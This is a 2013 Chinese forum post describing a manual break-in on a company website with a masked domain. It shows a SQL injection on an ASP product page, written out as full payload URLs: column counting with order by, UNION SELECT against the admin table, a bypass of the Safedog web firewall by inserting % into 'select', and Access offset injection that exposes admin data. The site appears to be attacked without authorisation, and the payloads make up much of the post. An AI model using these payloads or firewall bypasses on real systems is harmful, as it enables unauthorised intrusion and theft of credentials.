找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1926|回复: 0
打印 上一主题 下一主题

一次手工渗透突破安全狗防御+ACCESS偏移注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-8 21:49:45 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
打开网站,一个企业站。; p- _. d3 X4 ?+ e

& {7 y0 ?4 t6 |+ u2 ~$ g$ b7 K# ~3 l3 a, c! s: F
顺手加个admin
: T8 q- z7 @; ~: I& }* s* o' _+ e% k5 D  n) \5 f

3 p. y: U6 O/ r& c8 h" I默认后台。
& J( W, O0 _  O回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。​
% q7 L5 K: |! q0 G: Y6 l5 P- N' `* }, t9 t- c9 u

( M0 H/ F- n3 X) C* ~$ w+ H7 _. s' ^2 o4 r, L& ~: G
所以就不用御剑扫了,待会直接封IP。+ s+ |. r' \9 ]& ]8 N$ b
1 ~2 W! @5 N2 h4 P
用order by语句判断是否存在注入。
9 ?1 \( Y- g: s! @) K2 v9 [, Ihttp://www.xxx.com /product_show.asp?id=997 order by 1) f# z7 B% g3 x# n" A* I1 ^, h
http://www.xxx.com /product_show.asp?id=997 order by 1006 _& Q& ~, j- x! N
现在存在注入,经测试后发现是9个字段。
& U' B8 m6 p& Q8 T7 E" f/ q: U0 n. u 3 V. ~# l% ^( [: x6 Q) j$ m
接下来进行联合查询,猜是否存在admin表。
# @% {' ]; U0 p* X8 K; L$ C1 Fhttp://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。​
$ v7 d, O+ F; a; ?, c
5 h' M9 e/ V9 `( K9 k3 o+ O9 n+ k* y$ i1 ^" y0 h2 U! c: }
! V! X, f9 C5 a& B
在select中间加个%,se%lect绕过安全狗。2 K9 y- s( T* T+ A( v2 |: [* b

% ~9 S3 D* F5 ], ?1 t6 F* r2 `! H5 y
发现存在admin表,然后开始手工猜常用的字段。, a2 E! U1 ?0 d! I; V+ s  k7 r3 ?7 g
纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。! a- u+ s7 F0 L) D6 |8 _
# [3 w1 C' g7 }& n2 r; `+ y
突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。
+ N/ e0 U% T. d
% g5 q+ }  n. o9 N; |- \8 I科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。& V* ]6 K. k0 e) s) ^1 K6 U
http://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
2 d9 W$ M' `8 ^4 ^8 t! D/ h好了,敏感内容出显了。​
# Y( }8 Q4 I5 r/ F5 ?2 `- e5 o' W/ b& Y" U- z/ W8 ]8 n! h

& o& ]  c& f) a- Q' W
" V* a& f& ]2 p' U1 g
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表